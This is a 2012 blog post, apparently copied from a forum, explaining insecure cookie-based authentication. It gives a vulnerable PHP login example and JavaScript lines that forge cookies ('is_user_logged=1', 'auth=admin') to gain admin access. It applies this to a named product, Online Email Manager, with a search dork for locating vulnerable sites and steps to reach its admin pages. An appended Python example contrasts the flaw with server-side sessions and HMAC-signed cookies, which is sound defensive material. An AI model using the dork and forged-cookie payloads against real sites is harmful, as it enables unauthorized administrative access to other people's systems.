Tuesday, July 31, 2012

Insecure Cookie Handling



This is a vulnerability in which admin access is gained through a web server's incorrect cookie handling.
As an example, take a look at the code of vuln.php.

Code


<?php
// The password check only sets a client-side cookie (insecure, as in the post)
if ($_POST['password'] == $thepass) {
    setcookie("is_user_logged", "1");
} else { die("Login failed!"); }
// ............ etc .................
// admin.php is gated on a cookie value that the browser controls
if ($_COOKIE['is_user_logged'] == "1") {
    include "admin.php";
} else { die('not logged'); }

What went wrong here is the "is_user_logged" variable: if that cookie exists in the browser with the value 1, the user is treated as logged in. So right there,

javascript:document.cookie = "is_user_logged=1; path=/";

injecting that JavaScript is enough to be logged in.

If you look at the vuln that turned up in Online Email Manager, you will understand it better.

DorK : Powered by Online Email Manager

Suppose the admin page is at http://www.site.com/demo/OEM/admin/index.php. There,

inject the JavaScript javascript:document.cookie = "auth=admin; path=/"; and then open emailList.php ( http://www.site.com/demo/OEM/admin/emailList.php )


and you will find that you are already logged in as Admin.
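The root cause above is that the login decision is stored in a value the client controls. The following is an added example (not code from the original post) that reproduces the insecure check beside two server-controlled alternatives: a random session id that looks up login state on the server, and an HMAC-signed cookie that the server can verify. All names, the secret key and the password "s3cret" are constructed for this example.

```python
import hashlib
import hmac
import secrets
from http.cookies import SimpleCookie

SECRET_KEY = secrets.token_bytes(32)  # constructed; lives only on the server
SESSIONS = {}                          # constructed server-side store: sid -> state


def parse_cookies(header):
    """Parse a raw Cookie request header into a name -> value dict."""
    jar = SimpleCookie()
    jar.load(header or "")
    return {name: morsel.value for name, morsel in jar.items()}


def vulnerable_is_admin(cookie_header):
    """Same logic as the post's vuln.php: the client-sent value alone decides."""
    return parse_cookies(cookie_header).get("is_user_logged") == "1"


def login(username, password, expected_password):
    """On a valid password, create a server-side session and return its Set-Cookie value."""
    if not hmac.compare_digest(password.encode(), expected_password.encode()):
        return None
    sid = secrets.token_urlsafe(32)  # unguessable; the cookie carries no state itself
    SESSIONS[sid] = {"user": username, "is_user_logged": True}
    return f"sid={sid}; Path=/; HttpOnly; Secure; SameSite=Lax"


def hardened_is_admin(cookie_header):
    """Login state is read from the server store, never from the cookie value."""
    session = SESSIONS.get(parse_cookies(cookie_header).get("sid"))
    return bool(session and session.get("is_user_logged"))


def sign(value):
    return hmac.new(SECRET_KEY, value.encode(), hashlib.sha256).hexdigest()


def make_signed_cookie(value="1"):
    """Stateless alternative: the flag travels with an HMAC only the server can produce."""
    return f"is_user_logged={value}.{sign(value)}; Path=/; HttpOnly; Secure; SameSite=Lax"


def signed_is_admin(cookie_header):
    """A forged 'is_user_logged=1' (or a wrong tag) fails the constant-time HMAC check."""
    raw = parse_cookies(cookie_header).get("is_user_logged", "")
    value, _, tag = raw.rpartition(".")
    return value == "1" and hmac.compare_digest(tag, sign(value))
```

In the session variant the cookie is only a lookup key, so the forged value from the post never reaches a trust decision; in the signed variant the attacker would need SECRET_KEY to mint a valid tag.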

Ref : SirGod
post by negative thunder
copy from MHF
